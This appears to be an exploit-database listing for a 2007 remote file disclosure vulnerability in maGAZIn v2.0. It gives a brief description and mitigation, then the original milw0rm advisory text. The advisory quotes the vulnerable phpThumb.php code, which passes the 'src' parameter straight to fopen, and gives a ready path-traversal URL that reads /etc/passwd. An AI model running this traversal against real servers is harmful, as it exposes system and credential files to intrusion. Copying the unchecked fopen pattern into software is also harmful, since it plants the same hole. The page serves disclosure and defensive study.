header-logo
Suggest Exploit
vendor:
maGAZIn
by:
Y! Underground Group
5.5
CVSS
MEDIUM
Remote File Disclosure
200
CWE
Product Name: maGAZIn
Affected Version From: maGAZIn v2.0
Affected Version To: -
Patch Exists: NO
Related CWE: -
CPE: -
Metasploit:
Other Scripts:
Platforms Tested:
2007

maGAZIn v2.0 Remote File Disclosure Vulnerability

The vulnerability exists due to improper handling of user-supplied input in the 'src' parameter of the 'phpThumb.php' script. An attacker can exploit this vulnerability to disclose arbitrary files on the target system.

Mitigation:

Update to a patched version of the software or implement input validation to prevent the exploit.
Source

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   maGAZIn v2.0
[!] Download :   http://www.pinkcrow.net/Scripts/gallery.php
[!] Type     :   Remote File Disclosure Vulnerability

---------------------------------------------------------------------

---------------------------------------------------------------------

Vuln Code :  Line (152 - 157)

[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
		$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
		fclose($fp);
	} else {
		ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
	}
[/Code]

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/phpThumb.php?src=[Local File]

Example :

http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd

---------------------------------------------------------------------

# milw0rm.com [2007-05-11]

Navigation

Suggest Exploit

Services By CQR